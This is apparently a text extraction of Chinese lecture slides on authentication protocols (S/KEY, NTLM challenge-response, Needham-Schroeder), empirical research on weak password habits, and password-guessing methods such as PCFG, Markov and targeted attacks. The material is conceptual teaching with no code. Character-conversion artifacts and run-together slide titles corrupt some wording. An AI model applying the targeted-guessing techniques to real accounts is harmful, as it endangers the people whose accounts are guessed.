/KEY基本原理S/KEY安全性分析用戶的秘密口令沒有在網(wǎng)絡(luò)上傳輸，傳輸?shù)闹皇且淮涡钥诹?，并且一次性口令即使在傳輸過程中被竊取，也不能再次使用；客戶端和服務(wù)器存儲(chǔ)的是用戶秘密口令的散列值，即使客戶端和服務(wù)器被攻陷導(dǎo)致口令散列值被竊取，也需破解口令散列才能獲得明文口令S/KEY安全性分析用戶登錄一定次數(shù)后，客戶和服務(wù)器必須重新初始化口令序列；為了防止重放攻擊，系統(tǒng)認(rèn)證服務(wù)器具有唯一性，不適合分布式認(rèn)證單向認(rèn)證（即服務(wù)器對(duì)客戶端進(jìn)行認(rèn)證），不能保證認(rèn)證服務(wù)器的真實(shí)性S/KEY使用的種子和迭代值采用明文傳輸，攻擊者可以利用小數(shù)攻擊來獲取一系列口令冒充合法用戶S/KEY小數(shù)攻擊原理S/KEY改進(jìn)的S/KEY協(xié)議核心思想：不在網(wǎng)絡(luò)中傳輸一次性口令散列值。使用用戶的口令散列對(duì)挑戰(zhàn)進(jìn)行散列，并將計(jì)算結(jié)果發(fā)送給服務(wù)器。服務(wù)器收到后，同樣使用服務(wù)器保存的用戶口令散列對(duì)挑戰(zhàn)進(jìn)行散列計(jì)算，并與客戶端發(fā)來的應(yīng)答進(jìn)行比較，如果相同則認(rèn)證通過，否則拒絕Windows2000及其之后版本中的NTLM認(rèn)證所實(shí)現(xiàn)的挑戰(zhàn)/響應(yīng)機(jī)制就使用了這個(gè)改進(jìn)的S/KEY協(xié)議S/KEY改進(jìn)的S/KEY？WindowsNTLM改進(jìn)的S/KEY(2)WindowsNTLM改進(jìn)的S/KEY(1)(2)(3)(4)WindowsNTLM（另一張參考圖）改進(jìn)的S/KEY安全性分析：用戶很容易求出正確的一次性口令，采用一次性口令的匹配通過服務(wù)器的身份認(rèn)證；攻擊者即使截獲一次性口令，也不能破解出用戶口令散列；攻擊者不能預(yù)測(cè)下一次一次性口令，也不能重放成功。改進(jìn)的S/KEY協(xié)議安全性分析：能夠避免監(jiān)聽和重放，但不能防范攔截和修改數(shù)據(jù)包、會(huì)話劫持等攻擊。

網(wǎng)絡(luò)系統(tǒng)的安全僅等同于使用的最弱散列算法的安全強(qiáng)度。

沒有完整性保護(hù)機(jī)制，也無法防范內(nèi)部攻擊。不能對(duì)服務(wù)器的身份進(jìn)行認(rèn)證。改進(jìn)的S/KEY協(xié)議（二）其于共享密鑰的認(rèn)證Needham-Schroeder雙向鑒別協(xié)議問題1：執(zhí)行完上述三個(gè)步驟后，A和B已得到了由KDC分配的一次性會(huì)話密鑰，可用于后續(xù)的保密通信，為什么還要增加后面兩個(gè)步驟？問題2：第(5)步中，為什么要問個(gè)題f(N2)，而不是直接用N2？Needham-Schroeder雙向鑒別協(xié)議安全性分析及改進(jìn)思路Needham-Schroeder雙向鑒別協(xié)議內(nèi)容提綱身份認(rèn)證1口令行為規(guī)律和口令猜測(cè)2口令破解3口令防御4從直覺到理論口令規(guī)律口令有什么科學(xué)規(guī)律嗎？著名口令安全研究專家汪定教授所在團(tuán)隊(duì)的研究成果口令規(guī)律文獻(xiàn)[52]對(duì)8個(gè)知名的真實(shí)口令集（如表8-2所示）進(jìn)行了全面系統(tǒng)的分析，總結(jié)出3類脆弱口令行為：口令構(gòu)造的偏好性選擇、口令重用、基于個(gè)人信息構(gòu)造口令脆弱口令行為口令構(gòu)造的偏好性選擇：國民口令脆弱口令行為口令構(gòu)造的偏好性選擇：國民口令中文國民口令多為純數(shù)字，而英文國民口令多含有字母，這體現(xiàn)了語言對(duì)口令行為的影響。高達(dá)1.01%~10.44的用戶選擇流行的10個(gè)口令，這意味著攻擊者只需嘗試10個(gè)流行的口令，其成功率就會(huì)達(dá)到1.01%~10.44脆弱口令行為口令構(gòu)造的偏好性選擇：國民口令英文網(wǎng)民傾向于用某些單詞和短語，有25.88％的網(wǎng)民會(huì)將5個(gè)字母以上的單詞作為密口令，如password、letmein（意為“讓我登錄”）、sunshine、princess，當(dāng)然也包括“abcdef”，“abc123”以及“123456”這樣的國民口令。而中文網(wǎng)民只有2.41%使用英文單詞作為口令，但他們更喜歡用拼音名字（11.50%），尤其是全名。脆弱口令行為口令構(gòu)造的偏好性選擇：國民口令一些基于英文字母的所謂“強(qiáng)”密碼可能在中文環(huán)境中很弱，比如“woaini1314”，這個(gè)密碼在谷歌、新浪微博等網(wǎng)絡(luò)平臺(tái)均被評(píng)為強(qiáng)等級(jí)，然而中文網(wǎng)絡(luò)用戶很容易猜到這個(gè)密碼的含義。脆弱口令行為口令構(gòu)造的偏好性選擇：口令服從Zipf分布脆弱口令行為圖8-6人類生成的口令服從Zipf分布（源自文獻(xiàn)[52]圖1）口令構(gòu)造的偏好性選擇：口令字符構(gòu)成脆弱口令行為表8-4中英文用戶口令的字符組成結(jié)構(gòu)（文獻(xiàn)[52]的表3，表中數(shù)據(jù)單位為%）口令構(gòu)造的偏好性選擇：口令長度脆弱口令行為表8-5中英文用戶口令的長度分布（文獻(xiàn)[52]的表4，表中數(shù)據(jù)單位為%）口令重用：為了方便記憶，用戶不可避免地使用流行密碼，在不同網(wǎng)站重復(fù)使用同一個(gè)密碼，同時(shí)在密碼中嵌入個(gè)人相關(guān)信息，如姓名和生日等長久以來，用戶的口令重用被認(rèn)為是不安全的，所以應(yīng)當(dāng)避免。但是，近年的研究發(fā)現(xiàn)，面對(duì)如此多需要管理的賬號(hào)，重用口令是用戶理智的做法，關(guān)鍵是如何重用口令。只有跨不同安全級(jí)（或重要程度）的賬戶重用口令，才應(yīng)努力避免的脆弱口令行為口令重用：根據(jù)文獻(xiàn)[52]給出的結(jié)果：只有約30%的用戶重用口令時(shí)進(jìn)行簡(jiǎn)單修改（即新舊口令的相似度在[0.8,1]），絕大用戶的新舊口令的相似度小于0.8，也就是進(jìn)行了比較大的修改；中文用戶的口令中，約有40%以上間接重用的口令的相似度在[0.7,1]之間，而英文口令的這一比例為20%，說明中方用戶的口令重用問題更嚴(yán)重脆弱口令行為基于個(gè)人信息構(gòu)造口令用戶在構(gòu)造時(shí)喜歡使用姓名、生日、身份證號(hào)、電話號(hào)碼、電子郵件前綴、地名等個(gè)人信息脆弱口令行為表8-612306網(wǎng)站個(gè)人信息使用頻率（文獻(xiàn)[52]的表6，表中數(shù)據(jù)單位為%）基于個(gè)人信息構(gòu)造口令用戶在構(gòu)造時(shí)喜歡使用姓名、生日、身份證號(hào)、電話號(hào)碼、電子郵件前綴、地名等個(gè)人信息脆弱口令行為表8-7各類姓名的使用頻率（文獻(xiàn)[52]的表7，表中數(shù)據(jù)單位為%）韓偉力2016：中國人口令特點(diǎn)韓偉力2016：中國人口令特點(diǎn)韓偉力2016：中國人口令特點(diǎn)Ifshe/heusesletters:Ifshe/heusespinyin韓偉力2016：中國人口令特點(diǎn)汪定2015：中國用戶口令特征汪定2015：中國用戶口令特征汪定2015：中國用戶口令特征汪定2015：中國用戶口令特征汪定2015：中國用戶口令特征根據(jù)口令破解過程中是否需要連網(wǎng)，口令猜測(cè)算法分為在線破解（OnlineGuessing）和離線破解（OfflineGuessing）根據(jù)攻擊過程中是否利用用戶個(gè)人信息，口令猜測(cè)算法可以分為漫步攻擊（TrawlingAttacking）和定向攻擊（TargetedAttacking）口令猜測(cè)漫步攻擊基本思想：不關(guān)心攻擊對(duì)象的信息，而只關(guān)注在允許的猜測(cè)次數(shù)內(nèi)，猜測(cè)出更多的口令?；赑CFG的算法和Markov算法是目前主流的2種漫步攻擊算法口令猜測(cè)漫步攻擊口令猜測(cè)圖8-7PCFG算法的訓(xùn)練過程（文獻(xiàn)[52]的圖5）漫步攻擊馬爾科夫（Markov）算法是由Narayanan和Shmatikov等人于2005年提出的一種基于Markov模型的口令猜測(cè)算法，算法的核心假設(shè)是：用戶構(gòu)造口令從前向后依次進(jìn)行。因此，算法對(duì)整個(gè)口令進(jìn)行訓(xùn)練，通過從左到右的字符之間的聯(lián)系來計(jì)算口令的概率口令猜測(cè)漫步攻擊相關(guān)測(cè)試結(jié)果表明，PCFG算法在小猜測(cè)次數(shù)下（即在線猜測(cè)攻擊）最優(yōu)，Markov算法在大猜測(cè)次數(shù)下（即離線猜測(cè)攻擊）開始顯示優(yōu)勢(shì)，NLP攻擊效果介于PCFG和Markov之間口令猜測(cè)漫步攻擊汪定團(tuán)隊(duì)的研究顯示，中文網(wǎng)民的密碼在小猜測(cè)次數(shù)下（即在線猜測(cè)）更弱。因此，應(yīng)針對(duì)中文用戶采取特別的密碼保護(hù)措施口令猜測(cè)定向攻擊盡可能以最快速度猜測(cè)出所給定目標(biāo)（如網(wǎng)站、個(gè)人電腦）的口令。因此，攻擊者會(huì)利用與攻擊對(duì)象相關(guān)的個(gè)人信息（人口學(xué)相關(guān)信息），增強(qiáng)猜測(cè)的針對(duì)性除了用戶的人口學(xué)相關(guān)信息外，用戶在其他網(wǎng)站或系統(tǒng)中泄露的口令也可以被攻擊者利用來進(jìn)行定向攻擊口令猜測(cè)定向攻擊2016：汪定等人首次提出了基于Markov鏈的定向攻擊猜測(cè)算法：Targeted-Markov算法。該算法的基本思想是：人群中有多少比例使用某種個(gè)人信息，那么攻擊對(duì)象也有同樣可能使用該個(gè)人信息。將個(gè)人信息分為6大類：用戶名A、郵箱前綴E、姓名N、生日B、手機(jī)號(hào)P和身份證G口令猜測(cè)定向攻擊基